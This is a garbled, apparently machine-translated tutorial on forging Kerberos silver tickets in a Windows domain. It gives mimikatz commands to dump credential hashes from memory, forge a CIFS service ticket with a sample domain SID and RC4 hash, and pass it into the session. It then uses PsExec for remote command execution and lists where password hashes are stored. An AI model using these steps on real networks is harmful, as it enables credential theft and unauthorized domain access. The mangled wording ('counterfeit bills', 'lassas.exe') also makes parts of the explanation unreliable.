Kerberos article by our initial understanding of the working process of the Kerberos protocol, to solve two problems
The first question: How do I prove that you are responsible for the problem user XXX Authentication Server
The second question: How Served know that you have access to the services it provides. When a Client to access a service on Server server, Server how to determine whether Client has permission to access the service on your own host. The responsibility of the Ticket Granting Server
Kerberos protocol for the second problem to be solved: How Served know that you have access to the services it provides. An attacker put forward an idea, counterfeit bills TGS attack, so there are other methods of attack against kerberos authentication - TGS ticket counterfeit bills silver.
Silver Tickets (silver ticket) is forged TGS ticket, TGS ticket included forged PAC, used to allow the server to obtain the corresponding user information such as UID, KDC to confirm whether the user has permission to access a service.
Since silver TGS bill is counterfeit bill, it does not communicate with a domain controller 1,2,3,4 step, directly into the fifth step of the authentication ticket as a server portion AP_REQ TGS is transmitted to the service provided to the access services.
Silver production notes (Part golden ticket has been cut map, the main use of tools or mimikatz and psexec)
Silver production bills conditions:
1. Domain Name
SID field value 2.
3. The service account password HASH domain
4. fake user name, the user name may be any general administrator forgery
The need to access services
first step:
Administrator rights to run mimikatz
privilege :: debug # elevate privileges
sekurlsa :: logonpasswords # hash and obtain the service account sid (sid was the same under the same domain)
Step two:
Empty local ticket cache
kerberos :: purge # clean up local ticket cache
kerberos :: list # View saved locally bills
third step:
Silver and import counterfeit bills
kerberos::golden /domain:superman.com /sid:S-1-5-21-259090122-541454442-2960687606 /target:win08.superman.com /rc4:f6f19db774c63e49e9af61346adff204 /service:cifs /user:administrator /ptt
the fourth step:
Control access to shared directory domain
dir \\ win08 \ c $
Remote login, execute commands
PsExec.exe \\win08 cmd.exe
whoami View Permissions
The difference between gold and silver bills bills
1.TGS ticket is for a service on a machine, TGT is aimed at all services for all machines
2.TGT use hash krbtgt account, TGS ticket is the use of hash service account (target of hash, accounts displayed in the computer name $)
The results Gold notes:
We are able to log in as administrator on all machines inside the domain
The results Silver notes:
Before it can psexec after adding cifs permission to use silver as administrator notes able to log in as administrator after psexec
Before you can not move psexesvc after the machine after utility bills add silver cifs, dir entitled to see the changes to the right to view
hash location
The system is running, you need to crawl from memory -> lassas.exe process is stored inside the active user hash (currently logged on user) ordinary domain user or ordinary working group: SAM files (user password encrypted) / SYSTEM files (secret key) windows / system32 / config / SAM is currently stored in the user machine Hash
Domain Control: All domain users ntds.dit username / password (hash)